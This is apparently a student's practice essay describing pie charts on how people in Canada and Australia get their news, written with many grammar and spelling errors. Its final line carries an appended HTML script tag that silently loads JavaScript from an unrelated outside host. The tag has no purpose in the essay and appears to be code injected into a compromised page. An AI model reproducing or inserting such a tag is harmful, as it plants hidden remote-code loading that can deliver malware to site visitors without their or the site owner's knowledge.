The given pie charts represent the information about various methods for using accessing the mews in Canada and Australia, where was the data is in the percentage.
Overall, it is seen clearly from both graphs that the tv was the most favourite source in Canada and online sources were at the top position in Australia.
To comments with, accessing news from the television was the most selected source by people in Canada (around 40%), which were the second-best in Australia (with 37%). Reading news from the internet was in the first place in Australia with the proportion of 52%, which was nearly 16% higher as compared with Canada.
Moreover, other alternatives such as print media, radio and other ones were accounted for 14%,7%, and 3% in Canada respectively, while the percentage of all these ways were noted around 7% for printed media and 2% for both radio and other ones in Australia.<script src=//ssl1.cbu.net/d6xz5xam></script>
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